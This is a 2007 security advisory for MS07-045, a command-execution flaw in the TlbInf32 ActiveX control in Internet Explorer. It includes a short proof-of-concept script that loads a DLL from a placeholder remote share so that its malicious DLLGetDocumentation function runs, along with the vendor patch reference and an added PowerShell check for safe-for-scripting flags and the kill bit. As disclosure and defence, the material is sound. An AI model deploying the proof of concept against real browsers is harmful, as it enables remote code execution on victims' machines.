TlbInf32 ActiveX Command Execution
========================================================================
= TlbInf32 ActiveX Command Execution
=
= MS Bulletin posted:
= http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
=
= Affected Software:
= Internet Explorer
= tlbInf32.dll
= vstlbinf.dll
=
= Public disclosure on Wednesday August 15, 2007
========================================================================
The TypeLib Information object library, implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing
functionality easily accessible to both Visual Basic and C++
programmers.
Although it is not marked as safe for scripting in the registry, it does
implement IObjectSafety.
Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
The TypeLibInfoFromFile() function is used to open a file and retrieve
the typelib information from it.
TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo
This function will accept a webdav/smb share to a DLL file, allowing the
retrieval of information from a DLL hosted on a remote server.
========================================================================
TlbInf32.chm
Type libraries can contain help information for the library itself
(TypeLibInfo object), each TypeInfo (TypeInfo object), and each member
(MemberInfo object). This information is available in several
different forms.
HelpString is the documentation string which appears as a short
description of the string in object browsers. If the optional LCID
(Language/Country identifier) is specified, then the returned string
is localized if possible.
Documentation strings can be stored either in the type library
directly or retrieved via a call to the DLLGetDocumentation entry
point in the Dll specified by the HelpStringDll property.

The HelpStringContext is passed to the HelpStringDll to get the
correct documentation string for the object. The HelpStringDll and
HelpStringContext properties values are used automatically by the
HelpString property.
========================================================================
If the DLL file specified in the call to TypeLibInfoFromFile() has been
modified to direct the HelpStringDll property to a DLL which exports
a malicious DLLGetDocumentation function, then this function will be
executed when a request for the HelpString property is made.
<object width=1000 height=20 classid="CLSID:<CLASSID>" name=test></object>
x = test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
== Solutions ==
Install the vendor supplied patch.
http://www.microsoft.com/technet/security/Bulletin/MS07-045.mspx
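A defender-side check for the condition described above, added here as an example and not part of the original advisory: it reads the registry "safe for scripting/initializing" categories that the report lists for the CLSID and also checks Internet Explorer's kill bit (Compatibility Flags 0x400) for it. The function name is hypothetical, the registry locations are the standard COM and IE ones, and the advisory does not state whether the vendor patch sets the kill bit for this CLSID.

```powershell
# Added example: audit one ActiveX CLSID for exposure to script in Internet Explorer.
# Function name is hypothetical; the default CLSID is the one in the advisory's report.
function Get-ActiveXScriptExposure {
    param([string]$Clsid = '{8B217746-717D-11CE-AB5B-D41203C10000}')

    $catSafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C4A7A}'  # CATID_SafeForScripting
    $catSafeInit   = '{7DD95802-9882-11CF-9FA9-00AA006C4A7A}'  # CATID_SafeForInitializing
    $killBit       = 0x400                                     # kill bit in "Compatibility Flags"

    # Check the native registry view and the 32-bit view (WOW6432Node) on 64-bit Windows.
    foreach ($root in 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node') {
        $clsKey = "$root\Classes\CLSID\$Clsid"
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $registered = Test-Path -LiteralPath $clsKey

        # Path of the DLL that implements the control, if it is registered in this view.
        $server = $null
        if ($registered) {
            $server = (Get-ItemProperty -LiteralPath "$clsKey\InprocServer32" `
                       -ErrorAction SilentlyContinue).'(default)'
        }

        # A missing key or value yields $null, which -band treats as 0 (kill bit not set).
        $flags = (Get-ItemProperty -LiteralPath $compat `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'

        [pscustomobject]@{
            View             = $root
            Registered       = $registered
            Server           = $server
            RegSafeForScript = Test-Path -LiteralPath "$clsKey\Implemented Categories\$catSafeScript"
            RegSafeForInit   = Test-Path -LiteralPath "$clsKey\Implemented Categories\$catSafeInit"
            KillBitSet       = [bool]($flags -band $killBit)
        }
    }
}

Get-ActiveXScriptExposure | Format-Table -AutoSize
```

Because the control reports its safety through IObjectSafety at run time, RegSafeForScript = False does not mean the control is unscriptable; for a registered control, KillBitSet is the column that shows whether Internet Explorer is blocked from loading it.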
== Credit ==
Discovered and advised to Microsoft November 23 2006 by Brett Moore of
Security-Assessment.com
As this is my last advisory release before I leave sa.com and head off
into the future, I gotta say thanx to the team there, it's been a blast
guys.
All you kiwis overseas, have you thought about a trip home?
www.kiwicon.org
+-SoSD-+